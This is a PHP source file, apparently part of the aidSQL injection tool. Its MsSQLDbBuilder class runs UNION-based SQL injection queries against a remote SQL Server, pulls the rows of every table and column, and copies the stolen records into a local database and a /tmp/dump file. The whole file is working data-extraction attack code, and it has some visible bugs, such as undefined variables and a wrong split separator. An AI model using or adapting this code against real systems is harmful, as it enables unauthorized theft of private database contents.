<?php

	namespace aidSQL\db {

		class MsSQLDbBuilder extends AbstractDbBuilder {

			public function reverse(){
		
				$plugin	=	$this->_pLoader->getPluginInstance("sqli","mssql",$this->_httpAdapter,$this->_logger);

				$config	=	Array();
				$config["start-offset"]	=	$this->_injection["offset"];
				$config["field-types"]	=	implode(',',$this->_injection["fieldTypes"]);

				$plugin->setConfig($config);

				$queryBuilder	=	new \aidSQL\db\MsSQLQueryBuilder();
				$plugin->setQueryBuilder($queryBuilder);
			
				if(!isset($this->_injection["field-payload"])){

					$this->_injection["field-payload"]	=	"";

				}

				$fieldValues	=	Array();

				foreach($this->_injection["fieldValues"] as $index=>$value){

					$fieldValues[]	=	$value;

				}

				$this->_injection["fieldValues"]	=	$fieldValues;
				$this->_injection["limit"]	=	Array();

				$plugin->setInjectionParameters($this->_injection);
				$plugin->getFieldTypes();


				foreach($this->_schemas as $schemaName=>$schemaTables){

					$schemaName			=	$schemaName;

					$this->createDatabase($schemaName);

					foreach($schemaTables as $schemaTableName=>$schemaTableValues){

						if(isset($selectedIndexes)){

							if(!in_array($schemaTableName,$tables)){

								$this->log("Omitting table $schemaTableName",0,"yellow");
								continue;

							}
	
						}


						$this->createTable($schemaTableName,$schemaTableValues);

						$attributes			=	$schemaTableValues["attributes"];
						$columns				=	$schemaTableValues["columns"];
	
						$from					=	$schemaName."..".$schemaTableName;

						$count				=	$plugin->count('*',$from);
						$count				=	$count[0];

						$this->log("FOUND $count registers in table $schemaTableName",0,"light_cyan");

						if($count==0){

							$this->log("NO REGISTERS FOUND ON THIS TABLE BUD :/",1,"light_purple");
							continue;

						}//Implicit else


						$colSelect			=	Array();
						$colInsert			=	Array();

						foreach($columns as $col){

							//$colSelect[]	=	"master.dbo.fn_varbintohexstr(CONVERT(VARBINARY,$col[name]))";
							$colSelect[]	=	"CONVERT(VARCHAR,$col[name])";
							$colInsert[]	=	$col["name"];

						}

						$fieldSeparator	=	"CHAR(".ord("\a").")";
						$select				=	implode("+$fieldSeparator+",$colSelect);

						$parameters			=	$plugin->getInjectionParameters();
						$values				=	$plugin->unionQuery($select,0,$from,array(),array());

						if(!$values){

							$this->log("Seems like we have to fetch fields one by one :(",2,"yellow");

							$values	=	Array();

							foreach($columns as $col){

								switch(strtolower($col["type"])){

									case "varchar":
									case "char":
									case "nvarchar":
									case "text":
									case "varbinary":
										$select	=	$col["name"];
									break;

									default:
										$select	=	"CAST($col[name] AS CHAR(200))";
									break;

								}

								$values[$col["name"]]	=	$plugin->unionQuery($select,0,$from,array(),array());

								if(!$values[$col["name"]]){

									$this->log("Well ... FUCK! Can't fetch data for column $col[name]",1,"red");
									$this->log("Maybe the column doesn't has any value in it ...",1,"red");

									$values[$col["name"]]	=	array_pad(Array(),$count,"");
	
								}	

							}

							foreach($values as $index=>&$value){

								if(sizeof($value)!==$count){
									$value	=	array_pad($value,$count,"");
								}	

							}

							//////////////////////////////////////////////////////////////////////////////////////

							$this->log("Ordering obtained values",0,"light_cyan");

							$oldIndex			=	NULL;
							$reversedValues	=	Array();

							for($i=0;$i<$count;$i++){

								$orderedValues	=	Array();

								foreach($values as $index=>$value){

									$orderedValues[]	=	trim($value[$i]);

								}

								$reversedValues[]	=	$orderedValues;

							}

						}else{


							$reversedValues	=	Array();

							foreach($values as $value){

								$reversedValues[]	=	array_map("trim",explode(ord("\a"),$value));

							}

						}

						file_put_contents("/tmp/dump",var_export($reversedValues,TRUE));

						if(!$this->insertRegisters($schemaTableName,$colInsert,$reversedValues)){

							throw(new \Exception("Couldnt insert registers on $schemaTableName table!".$this->_dbAdapter->errno.':'.$this->_dbAdapter->error));
						}

					}

				}

			}

			public function createTable($tableName,Array $tableColumns){

				$sql	=	NULL;
				$sql	=	"CREATE TABLE IF NOT EXISTS $tableName(";

				$columns	=	array();

				foreach($tableColumns["columns"] as $index=>$column){

					switch(strtolower($column["type"])){
						case "char":
						case "varchar":
							$column["type"]	=	"TEXT";
						break;

						case "int":
						case "smallint":
							break;

						default:
							$column["type"]	=	"VARCHAR(500)";
						break;

					}

					$columns[]=$column["name"].' '.$column["type"];

				}

				$columns		=	implode(',',$columns);
				$sql			=	"CREATE TABLE IF NOT EXISTS $tableName(".$columns.")";
				$truncate	=	"TRUNCATE TABLE $tableName";
				
				return ($this->_dbAdapter->query($sql) && $this->_dbAdapter->query($truncate));

			}

			public function insertRegisters($tableName,Array $columns,Array $registers){

				$tableName	=	$this->_dbAdapter->real_escape_string($tableName);			
				$tableName	=	$this->getTablePrefix().$tableName;

				foreach($registers as $k=>$reg){

					foreach($reg as $index=>&$value){
			
						$value	=	"$columns[$index]='".$this->_dbAdapter->real_escape_string($value)."'";

					}

					$sql	=	"INSERT INTO $tableName SET ".implode(',',$reg);
					$this->_dbAdapter->query($sql);	

				}

				return TRUE;

			}

		}

	}

?>
